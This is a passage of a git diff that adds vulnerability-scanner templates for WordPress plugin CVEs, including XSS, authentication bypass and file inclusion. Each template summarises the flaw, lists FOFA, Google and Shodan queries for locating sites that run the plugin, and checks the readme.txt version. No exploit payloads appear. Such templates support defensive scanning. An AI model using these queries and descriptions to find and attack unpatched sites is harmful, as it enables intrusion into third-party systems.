+ - compare_versions(version, '<= 2.7.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml b/poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml
new file mode 100644
index 0000000000..4cb59f7a74
--- /dev/null
+++ b/poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43306-f131b00187e803d708a0f231c364afbd
+
+info:
+ name: >
+ WP-Lister Lite for eBay <= 3.6.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP-Lister Lite for eBay plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76ded81-4c78-4054-9a26-7e215285a2b6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43306
+ metadata:
+ fofa-query: "wp-content/plugins/wp-lister-for-ebay/"
+ google-query: inurl:"/wp-content/plugins/wp-lister-for-ebay/"
+ shodan-query: 'vuln:CVE-2024-43306'
+ tags: cve,wordpress,wp-plugin,wp-lister-for-ebay,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-lister-for-ebay/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-lister-for-ebay"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml b/poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml
new file mode 100644
index 0000000000..7d2ff73f5c
--- /dev/null
+++ b/poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3
+
+info:
+ name: >
+ Structured Content <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/908e4755-e439-4714-b0cb-3fc546c5ac63?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43307
+ metadata:
+ fofa-query: "wp-content/plugins/structured-content/"
+ google-query: inurl:"/wp-content/plugins/structured-content/"
+ shodan-query: 'vuln:CVE-2024-43307'
+ tags: cve,wordpress,wp-plugin,structured-content,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/structured-content/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "structured-content"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml b/poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml
new file mode 100644
index 0000000000..f1cedc13f0
--- /dev/null
+++ b/poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74
+
+info:
+ name: >
+ Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43308
+ metadata:
+ fofa-query: "wp-content/plugins/gutentor/"
+ google-query: inurl:"/wp-content/plugins/gutentor/"
+ shodan-query: 'vuln:CVE-2024-43308'
+ tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gutentor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml b/poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml
new file mode 100644
index 0000000000..927c333199
--- /dev/null
+++ b/poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2
+
+info:
+ name: >
+ WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Telegram Widget and Join Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43309
+ metadata:
+ fofa-query: "wp-content/plugins/wptelegram-widget/"
+ google-query: inurl:"/wp-content/plugins/wptelegram-widget/"
+ shodan-query: 'vuln:CVE-2024-43309'
+ tags: cve,wordpress,wp-plugin,wptelegram-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wptelegram-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.27')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml b/poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml
new file mode 100644
index 0000000000..fc344b9f3c
--- /dev/null
+++ b/poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9
+
+info:
+ name: >
+ Login As Users <= 1.4.2 - Authentication Bypass
+ author: topscoder
+ severity: critical
+ description: >
+ The Login As Users plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.2. This is due to the plugin not properly verifying that a user switching back to a user is authorized to do so. This makes it possible for unauthenticated attackers to access other users accounts which can be administrators.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43311
+ metadata:
+ fofa-query: "wp-content/plugins/login-as-users/"
+ google-query: inurl:"/wp-content/plugins/login-as-users/"
+ shodan-query: 'vuln:CVE-2024-43311'
+ tags: cve,wordpress,wp-plugin,login-as-users,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "login-as-users"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml b/poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml
new file mode 100644
index 0000000000..346cdee157
--- /dev/null
+++ b/poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f
+
+info:
+ name: >
+ FormFacade <= 1.3.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The FormFacade – WordPress plugin for Google Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirectURL' parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0166c9-1349-45df-9e0f-ff4bc1a67c73?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43313
+ metadata:
+ fofa-query: "wp-content/plugins/formfacade/"
+ google-query: inurl:"/wp-content/plugins/formfacade/"
+ shodan-query: 'vuln:CVE-2024-43313'
+ tags: cve,wordpress,wp-plugin,formfacade,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/formfacade/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "formfacade"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml b/poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml
new file mode 100644
index 0000000000..9c986e2a46
--- /dev/null
+++ b/poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d
+
+info:
+ name: >
+ e2pdf <= 1.25.05 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The e2pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.25.05 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f94a1671-11f8-4a05-b950-a068edf29f43?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43318
+ metadata:
+ fofa-query: "wp-content/plugins/e2pdf/"
+ google-query: inurl:"/wp-content/plugins/e2pdf/"
+ shodan-query: 'vuln:CVE-2024-43318'
+ tags: cve,wordpress,wp-plugin,e2pdf,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e2pdf/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "e2pdf"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.25.05')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml b/poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
new file mode 100644
index 0000000000..7b91ea19d5
--- /dev/null
+++ b/poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+ The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.31 via the h5vp_export_data() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract potentially sensitive information from exports.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43319
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:CVE-2024-43319'
+ tags: cve,wordpress,wp-plugin,html5-video-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.31')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml b/poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml
new file mode 100644
index 0000000000..093b8563f2
--- /dev/null
+++ b/poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f
+
+info:
+ name: >
+ Team Showcase <= 1.22.23 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.22.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f702fef0-8f07-4c94-bbf7-394d66f9ddde?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43321
+ metadata:
+ fofa-query: "wp-content/plugins/team/"
+ google-query: inurl:"/wp-content/plugins/team/"
+ shodan-query: 'vuln:CVE-2024-43321'
+ tags: cve,wordpress,wp-plugin,team,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/team/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "team"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.22.23')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml b/poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml
new file mode 100644
index 0000000000..0905e20f53
--- /dev/null
+++ b/poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f
+
+info:
+ name: >
+ Zephyr Project Manager <= 3.3.100 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The Zephyr Project Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.100 via the updateTaskStatus() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to edit task statuses that do not belong to them.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/98a73a02-33fa-4dd4-9606-3d35d58c2398?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43322
+ metadata:
+ fofa-query: "wp-content/plugins/zephyr-project-manager/"
+ google-query: inurl:"/wp-content/plugins/zephyr-project-manager/"
+ shodan-query: 'vuln:CVE-2024-43322'
+ tags: cve,wordpress,wp-plugin,zephyr-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zephyr-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.100')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml b/poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml
new file mode 100644
index 0000000000..9cfb56519e
--- /dev/null
+++ b/poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b
+
+info:
+ name: >
+ Invite Anyone <= 1.4.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Invite Anyone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b02613dc-8c31-4c86-b800-eb1039381e1f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43327
+ metadata:
+ fofa-query: "wp-content/plugins/invite-anyone/"
+ google-query: inurl:"/wp-content/plugins/invite-anyone/"
+ shodan-query: 'vuln:CVE-2024-43327'
+ tags: cve,wordpress,wp-plugin,invite-anyone,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/invite-anyone/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "invite-anyone"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml b/poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml
new file mode 100644
index 0000000000..ed7bd6137f
--- /dev/null
+++ b/poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242
+
+info:
+ name: >
+ EmbedPress <= 4.0.9 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The EmbedPress – Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.9 via the 'page_type' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a1b117-945f-49bc-9ea1-313afa93bf32?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43328
+ metadata:
+ fofa-query: "wp-content/plugins/embedpress/"
+ google-query: inurl:"/wp-content/plugins/embedpress/"
+ shodan-query: 'vuln:CVE-2024-43328'
+ tags: cve,wordpress,wp-plugin,embedpress,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embedpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "embedpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml b/poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml
new file mode 100644
index 0000000000..2299c7166c
--- /dev/null
+++ b/poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f
+
+info:
+ name: >
+ WP SMS <= 6.9.3 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.9.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/08cb2162-fac3-47af-9292-116095ee40dc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43331
+ metadata:
+ fofa-query: "wp-content/plugins/wp-sms/"
+ google-query: inurl:"/wp-content/plugins/wp-sms/"
+ shodan-query: 'vuln:CVE-2024-43331'
+ tags: cve,wordpress,wp-plugin,wp-sms,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-sms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-sms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.9.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml b/poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml
new file mode 100644
index 0000000000..65c3552573
--- /dev/null
+++ b/poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0
+
+info:
+ name: >
+ Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Responsive Blocks – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the taxonomy block in versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43335
+ metadata:
+ fofa-query: "wp-content/plugins/responsive-block-editor-addons/"
+ google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/"
+ shodan-query: 'vuln:CVE-2024-43335'
+ tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
